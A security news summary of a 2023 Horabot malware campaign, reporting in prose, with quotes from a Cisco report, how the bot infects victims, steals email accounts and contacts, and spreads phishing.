Security News > 2023 > June > New Horabot campaign takes over victim's Gmail, Outlook accounts
The malware enables the operators to take control of the victim's Gmail, Outlook, Hotmail, or Yahoo email accounts, steal email data and 2FA codes arriving in the inbox, and send phishing emails from the compromised accounts.
The victim clicks on the hyperlink on the page and downloads a RAR archive that contains a batch file with a CMD extension, which downloads a PowerShell script that fetches trojan DLLs and a set of legitimate executables from the C2 server.
Once the credentials are compromised, the tool takes over the victim's email account, generates spam emails, and sends them to the contacts found in the victim's mailbox, furthering the infection somewhat randomly.
The primary payload dropped onto the victim's system is Horabot, a documented PowerShell-based botnet that targets the victim's Outlook mailboxes to steal contacts and disseminate phishing emails containing malicious HTML attachments.
"After initialization, the [Horabot] script looks for the Outlook data files from the victim profile's Outlook application data folder," explains Cisco in the report.
"It enumerates all folders and emails in the victim's Outlook data file and extracts email addresses from the emails' sender, recipients, CC, and BCC fields."